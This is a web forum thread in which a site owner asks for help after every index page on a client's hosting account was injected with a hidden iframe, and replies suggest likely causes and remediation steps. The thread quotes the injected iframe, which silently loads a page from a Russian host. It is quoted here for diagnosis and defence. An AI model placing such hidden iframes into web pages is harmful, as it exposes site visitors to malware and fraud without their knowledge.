Been Hacked

[Hooch]

Hello all. I have a client who was hacked. All thier websites under the 1 package they have werecomprimised. So I have to wonder if they cracked their CPanel password. The problem that has occured is an iframe was entered to the code of every index.php andevery index.html page on all the sites. Even in sub folders. I went and deleted all the codebut it shows back up again after some time. Here's the code...

iframe src="http://3f4.ru:8080/index.php" width=151 height=198 style="visibility: hidden"

Any idea how this would have happened? I'm not sure if it would be through the CPanel or maybe itwould be a form I created? Or was the web provider hacked? And if anyone has experience with this how do I find the hole? I did email the providers abuse dept. but a quick responce from here may save downtime.Thank you

[boen_robot]

If it's at the very bottom of your PHP and HTML files, i.e.

<?php//PHP code here?><iframe src="http://3f4.ru:8080/index.php" width=151 height=198 style="visibility: hidden"><iframe>

Then it's unlikely that a form you created is the reason... unless you have a form that lets users edit files on the server. If you have such a form, it's possible that the attacker worked around your defences in it to alter PHP files.Otherwise, cracking your FTP and/or CPanel accounts is the more likely cause. Change your password at those places, and make sure it's a strong password too.If you use third party CMS-es (WordPress, Joomla, IPB, etc.), upgrade them to their latest versions, as it is possible that a security hole in THEM let to the demise of your own files.

[Hooch]

Thanks for that info.The index.html files had the code just after the body tag. (opening tag)The index.php files had the code at the very bottom.I did change the passwords.I went to PCTools.com and created one there.Here's hoping it's fixed!!

[Synook]

If you have the option, also use SFTP instead of FTP, as it is more secure.

[Hooch]

Okay thank you Synook. Any help here is very much appreciated.I had a question asked by one of the members why would they hack us?Why do they want our information.I don't think this was for that. This was more for getting people to visitsites so the hacker can receive $$ correct?Can anyone shed light one what the reason may have been from that code above?Thank you

[boen_robot]

Okay thank you Synook. Any help here is very much appreciated.I had a question asked by one of the members why would they hack us?Why do they want our information.I don't think this was for that. This was more for getting people to visitsites so the hacker can receive $$ correct?Can anyone shed light one what the reason may have been from that code above?Thank you

I think your assumption on ad revenue is a correct one. If your users click those ads, the attacker gets some cash.There's also one more thing to note though. The attacker detects success. He now knows there is a weak link in the chain that he can use to try and do some real damage, like stealing your users' passwords. And once they do that, they could try and use them on other sites to potentially get their banking information at the end and steal their money.

[Hooch]

I'm assuming the FTP was cracked. Not sure how since it was a difficult one.If the CPanel PW was cracked should I be worried and look for files they mayhave uploaded? Is this a normal practice?I am looking, but nothing found yet. If they have got ahold of the users table in the DB those passwords were hashed and salted.How could they know what the pw is?

[boen_robot]

The answer to all of it - brute force attack.If they can get ahold of the users table, AND they know your exact hash types and salting algoritms, they can try all possible combinations until the hash matches.Same deal with FTP and CPanel - they try every possible password, and store it. You can easily write a program that does that.You can ask your host if they do some "auditing" on CPanel and FTP. i.e. if they block a certain IP after N amount of unsuccessful login attempts per day.

[Hooch]

Steps done so far:1. Changed passwords for CPanel and FTP.2. Changed password for the database.To do:1. Ask members of the site to change thier password and also change passwords that are the same on other important sites (ie banking)2. Look into blocking ip's after numerous login failures.Anything else you would recommend?And thank you for your time and knowledge on this issue.

[Synook]

What happened to using SFTP? Remember, if you use normal FTP your password is sent in plain to the server.

[Hooch]

That too :)Just checked....No SFTP

[walapu]

http://whois.domaintools.com/3f4.ruTry this maybe? There is a number. It is very odd though that each time you refresh the ip changes. After a few trys I got this one 62.112.155.45 it seems to be the correct one.I did a who is search on the ip and it came up with this.http://www.networksolutions.com/whois/resu...p=62.112.155.45Then I managed to get this.http://www.db.ripe.net/whois?form_type=sim...o_search=Search